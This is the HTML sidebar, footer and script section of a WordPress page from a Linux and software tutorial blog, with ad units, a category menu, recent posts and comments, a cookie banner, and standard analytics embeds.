</div></div><div id="subscribebox-widget-2" class="widget subscribebox"><div class="widget-wrap"><h3 class="widgettitle"><span>Subscribe</span></h3><div class="textwidget"><p>Enter your email address below to receive updates each time we publish new content.</p>
			
			<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=LinuxForexAndGis', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
				<input type="hidden" value="LinuxForexAndGis" name="uri"/>
				<input type="hidden" name="loc" value="en_US"/>
				<p class="email-form">
					<input type="text" class="sub" name="email" value="email address" onfocus="if (this.value == 'email address') {this.value = '';}" onblur="if (this.value == '') {this.value = 'email address';}" /><input type="submit" value="submit" class="subbutton" />
				</p>
				<div style="clear:both;"><small>Privacy guaranteed. We never share your info.</small></div>
			</form>

			
		</div>
		</div></div><div id="text-11" class="widget widget_text"><div class="widget-wrap"><h3 class="widgettitle"><span>Advertisement</span></h3>			<div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 200_link -->
<ins class="adsbygoogle"
     style="display:inline-block;width:200px;height:90px"
     data-ad-client="ca-pub-3642255147113369"
     data-ad-slot="8929399866"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
		</div></div><div id="text-10" class="widget widget_text"><div class="widget-wrap"><h3 class="widgettitle"><span>Find Us on Google +</span></h3>			<div class="textwidget"><!-- Place this tag in your head or just before your close body tag. -->
<script src="https://apis.google.com/js/platform.js" async defer></script>

<!-- Place this tag where you want the widget to render. -->
<div class="g-page" data-href="//plus.google.com/u/0/115904648801167232184" data-rel="publisher"></div></div>
		</div></div><div id="text-8" class="widget widget_text"><div class="widget-wrap"><h3 class="widgettitle"><span>Ads</span></h3>			<div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- gamblisfx_big -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-3642255147113369"
     data-ad-slot="1604609460"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
		</div></div><div id="categories-2" class="widget widget_categories"><div class="widget-wrap"><h3 class="widgettitle"><span>Categories</span></h3><label class="screen-reader-text" for="cat">Categories</label><select name='cat' id='cat' class='postform' >
	<option value='-1'>Select Category</option>
	<option class="level-0" value="25">Amazing Thing</option>
	<option class="level-0" value="1233">Amazon AWS</option>
	<option class="level-0" value="34">Android</option>
	<option class="level-0" value="1779">Anti Virus</option>
	<option class="level-0" value="1339">Apple</option>
	<option class="level-0" value="39">Applications</option>
	<option class="level-0" value="1048">Arch Linux</option>
	<option class="level-0" value="1030">Art and Design</option>
	<option class="level-0" value="1931">Audio</option>
	<option class="level-0" value="1846">Backup</option>
	<option class="level-0" value="1800">Bluetooth</option>
	<option class="level-0" value="938">Budidaya Lele</option>
	<option class="level-0" value="2028">C#</option>
	<option class="level-0" value="1690">Cars</option>
	<option class="level-0" value="2">CentOS</option>
	<option class="level-0" value="1535">Chipset</option>
	<option class="level-0" value="1272">Cloud Storage</option>
	<option class="level-0" value="1152">Database</option>
	<option class="level-0" value="1788">Database</option>
	<option class="level-0" value="398">Debian</option>
	<option class="level-0" value="87">Download</option>
	<option class="level-0" value="55">Drivers</option>
	<option class="level-0" value="2038">Education</option>
	<option class="level-0" value="564">Elementary OS</option>
	<option class="level-0" value="18">Fedora</option>
	<option class="level-0" value="1795">Fingerprint</option>
	<option class="level-0" value="29">Forex</option>
	<option class="level-0" value="2023">Gambas</option>
	<option class="level-0" value="175">GIS</option>
	<option class="level-0" value="1264">Google Cloud Platform</option>
	<option class="level-0" value="1884">Hydroponic</option>
	<option class="level-0" value="1983">Hydroponics</option>
	<option class="level-0" value="986">Icons and Themes</option>
	<option class="level-0" value="1919">Image Tool</option>
	<option class="level-0" value="1822">Internet &amp; Network</option>
	<option class="level-0" value="1540">Kubuntu</option>
	<option class="level-0" value="14">Linux Deepin</option>
	<option class="level-0" value="364">Linux Distribution</option>
	<option class="level-0" value="60">Linux Mint</option>
	<option class="level-0" value="297">Linux Software</option>
	<option class="level-0" value="1543">Mac Software</option>
	<option class="level-0" value="1063">Manjaro</option>
	<option class="level-0" value="1483">Microsoft Access</option>
	<option class="level-0" value="1785">Multimedia</option>
	<option class="level-0" value="937">My Hobbies</option>
	<option class="level-0" value="1497">Network Camera</option>
	<option class="level-0" value="2128">Notebook</option>
	<option class="level-0" value="2043">Office</option>
	<option class="level-0" value="2179">OpenMediaVault</option>
	<option class="level-0" value="206">OpenSUSE</option>
	<option class="level-0" value="212">opensuse tips</option>
	<option class="level-0" value="74">Other Linux</option>
	<option class="level-0" value="1433">OwnCloud</option>
	<option class="level-0" value="2066">PDF Tutorial</option>
	<option class="level-0" value="10">Pear Linux</option>
	<option class="level-0" value="501">PPA&#8217;s</option>
	<option class="level-0" value="1752">Printer</option>
	<option class="level-0" value="469">Programming</option>
	<option class="level-0" value="2051">Programming</option>
	<option class="level-0" value="2053">Python</option>
	<option class="level-0" value="2060">Raspberry Pi</option>
	<option class="level-0" value="418">Screenshots</option>
	<option class="level-0" value="510">Script</option>
	<option class="level-0" value="136">Server</option>
	<option class="level-0" value="1130">Smartphone</option>
	<option class="level-0" value="1792">Smartphone</option>
	<option class="level-0" value="626">Tips</option>
	<option class="level-0" value="196">Travelling</option>
	<option class="level-0" value="186">Ubuntu</option>
	<option class="level-0" value="1">Uncategorized</option>
	<option class="level-0" value="1304">Univention Corporate Server</option>
	<option class="level-0" value="1803">Utility</option>
	<option class="level-0" value="1484">VBA</option>
	<option class="level-0" value="2120">VGA Card</option>
	<option class="level-0" value="952">Videos</option>
	<option class="level-0" value="240">Virtualization</option>
	<option class="level-0" value="1990">VisualBasic.NET</option>
	<option class="level-0" value="1156">Windows</option>
	<option class="level-0" value="284">Windows Software</option>
	<option class="level-0" value="51">Xubuntu</option>
</select>

<script type='text/javascript'>
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "cat" );
	function onCatChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) {
			location.href = "http://gamblisfx.com/?cat=" + dropdown.options[ dropdown.selectedIndex ].value;
		}
	}
	dropdown.onchange = onCatChange;
})();
/* ]]> */
</script>

</div></div><div id="text-5" class="widget widget_text"><div class="widget-wrap">			<div class="textwidget"><p><a href="http://add.my.yahoo.com/rss?url=http://feeds.feedburner.com/LinuxForexAndGis" title="Linux, Forex and GIS"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" alt="" style="border:0"/></a></p>
<p><a href="http://www.bloglines.com/sub/http://feeds.feedburner.com/LinuxForexAndGis" title="Linux, Forex and GIS" type="application/rss+xml"><img src="http://www.bloglines.com/images/sub_modern11.gif" alt="Subscribe in Bloglines" style="border:0"/></a></p>
<p><a href="http://www.thefreedictionary.com/_/hp/AddRSS.aspx?http://feeds.feedburner.com/LinuxForexAndGis" title="Add to The Free Dictionary"><img alt="Add to The Free Dictionary" border="0" src="http://img.tfd.com/hp/addToTheFreeDictionary.gif" width="91" height="17"/></a></p>
<!-- Histats.com  START  (standard)-->
<script type="text/javascript">document.write(unescape("%3Cscript src=%27http://s10.histats.com/js15.js%27 type=%27text/javascript%27%3E%3C/script%3E"));</script>
<a href="http://www.histats.com" target="_blank" title="cool hit counter" ><script  type="text/javascript" >
try {Histats.start(1,2529600,4,107,170,20,"00011001");
Histats.track_hits();} catch(err){};
</script></a>
<noscript><a href="http://www.histats.com" target="_blank"><img  src="http://sstatic1.histats.com/0.gif?2529600&101" alt="cool hit counter" border="0"></a></noscript>
<!-- Histats.com  END  --></div>
		</div></div>		<div id="recent-posts-2" class="widget widget_recent_entries"><div class="widget-wrap">		<h3 class="widgettitle"><span>Recent Posts</span></h3>		<ul>
					<li>
				<a href="http://gamblisfx.com/duplicati-2-0-1-pre-release-is-now-available/">Duplicati 2.0.1 Pre Release is now available</a>
						</li>
					<li>
				<a href="http://gamblisfx.com/fedora-tutorial-how-to-install-fedora-24-server/">Fedora Tutorial-How to install Fedora 24 Server</a>
						</li>
					<li>
				<a href="http://gamblisfx.com/proxmox-4-2-2-comes-with-a-new-interface-design/">Proxmox 4.2.2 comes with a new interface design</a>
						</li>
					<li>
				<a href="http://gamblisfx.com/cara-install-pydio-di-ubuntu-14-04-server/">Cara install Pydio di Ubuntu 14.04 Server</a>
						</li>
					<li>
				<a href="http://gamblisfx.com/postgresql-9-5-3-is-available-how-to-install-it-on-debian-linux/">PostgreSQL 9.5.3 is available, how to install it on Debian Linux</a>
						</li>
				</ul>
		</div></div>		<div id="recent-comments-2" class="widget widget_recent_comments"><div class="widget-wrap"><h3 class="widgettitle"><span>Recent Comments</span></h3><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link"><a href='http://about.me/edwardcrosby' rel='external nofollow' class='url'>Edward Crosby</a></span> on <a href="http://gamblisfx.com/how-to-join-fedora-22-to-windows-active-directory/#comment-8805">How to join Fedora 22 to Windows Active Directory</a></li><li class="recentcomments"><span class="comment-author-link">jaime</span> on <a href="http://gamblisfx.com/install-kazam-1-4-5-on-fedora-23-workstation/#comment-8785">Install Kazam 1.4.5 on Fedora 23 Workstation</a></li><li class="recentcomments"><span class="comment-author-link">Fiddler</span> on <a href="http://gamblisfx.com/install-virtualbox-guest-additions-on-fedora-23/#comment-8715">Install Virtualbox Guest Additions on Fedora 23</a></li><li class="recentcomments"><span class="comment-author-link">Fiddler</span> on <a href="http://gamblisfx.com/install-virtualbox-guest-additions-on-fedora-23/#comment-8714">Install Virtualbox Guest Additions on Fedora 23</a></li><li class="recentcomments"><span class="comment-author-link"><a href='http://gamblisfx.com' rel='external nofollow' class='url'>gamblis</a></span> on <a href="http://gamblisfx.com/how-to-create-fedora-23-live-usb-from-windows/#comment-8708">How to create Fedora 23 Live USB from Windows</a></li></ul></div></div>			</div>

			<div id="sidebar-bottom" class="clearfix">

				<div id="sidebar-bottom-left">
														</div>

				<div id="sidebar-bottom-right">
														</div>

			</div>

		</div>


	</div>

	
</div>


<div id="footer">
	<div class="limit clearfix">

		<div class="sub-icons clearfix">

	<a title="Subscribe via RSS Feed" href="http://gamblisfx.com/feed/"><img class="rss-sub" src="http://gamblisfx.com/wp-content/themes/wp-davinci-20/images/feed.png" alt="Subscribe via RSS Feed" align="top" /></a>

	<a rel="external" title="Follow Me on Twitter" href="http://www.twitter.com/fitriaryani2011"><img class="twitter-sub" src="http://gamblisfx.com/wp-content/themes/wp-davinci-20/images/twitter.png" alt="Follow Me on Twitter" align="top" /></a>


	<a title="Connect on Google Plus" rel="external" href="https://plus.google.com/+FitriAryani?rel=author"><img class="gplus-sub" src="http://gamblisfx.com/wp-content/themes/wp-davinci-20/images/google-plus.png" alt="Connect on Google Plus" align="top" /></a>






</div>
		
		&copy;  2016 Full Version Software and Tutorial. All rights reserved. <a href="">Premium WordPress Themes</a>.

	</div>
</div>

</div>

<div id="cookie-law-info-bar"><span>This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish.<a href="#" id="cookie_action_close_header"  class="medium cli-plugin-button cli-plugin-main-button" >Accept</a> <a href="http://gamblisfx.com" id="CONSTANT_OPEN_URL" target="_blank"  class="cli-plugin-main-link"  >Read More</a></span></div><div id="cookie-law-info-again"><span id="cookie_hdr_showagain">Privacy & Cookies Policy</span></div>		
		<script type="text/javascript">
			//<![CDATA[
			jQuery(document).ready(function() {
				cli_show_cookiebar({
					settings: '{"animate_speed_hide":"500","animate_speed_show":"500","background":"#fff","border":"#444","border_on":true,"button_1_button_colour":"#000","button_1_button_hover":"#000000","button_1_link_colour":"#fff","button_1_as_button":true,"button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":false,"font_family":"inherit","header_fix":false,"notify_animate_hide":true,"notify_animate_show":false,"notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":false,"scroll_close_reload":false,"showagain_tab":true,"showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#000","show_once_yn":true,"show_once":"10000"}'
				});
			});
			//]]>
		</script>
		
		    <!-- Start of StatCounter Code -->
    <script>
    <!-- 
        var sc_project=9449079; 
        var sc_security="8c9a330c"; 
      var sc_invisible=1;
        var scJsHost = (("https:" == document.location.protocol) ?
        "https://secure." : "http://www.");
    //-->
document.write("<sc"+"ript src='" +scJsHost +"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="web analytics" href="https://statcounter.com/"><img class="statcounter" src="https://c.statcounter.com/9449079/0/8c9a330c/1/" alt="web analytics" /></a></div></noscript>   
    <!-- End of StatCounter Code -->
	<div style="display:none">
	<div class="grofile-hash-map-a7cbbdc3fd9b07353cbc37484af16185">
	</div>
	</div>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/plugins/akismet/_inc/form.js?ver=3.1.11'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-includes/js/comment-reply.min.js?ver=4.5.2'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201621'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2016Mayaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.5.2'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-includes/js/wp-embed.min.js?ver=4.5.2'></script>
<script type='text/javascript' src='http://stats.wp.com/e-201621.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:4.0.2',blog:'89422906',post:'4552',tz:'0',srv:'gamblisfx.com'} ]);
	_stq.push([ 'clickTrackerInit', '89422906', '4552' ]);
</script>

</body>

</html>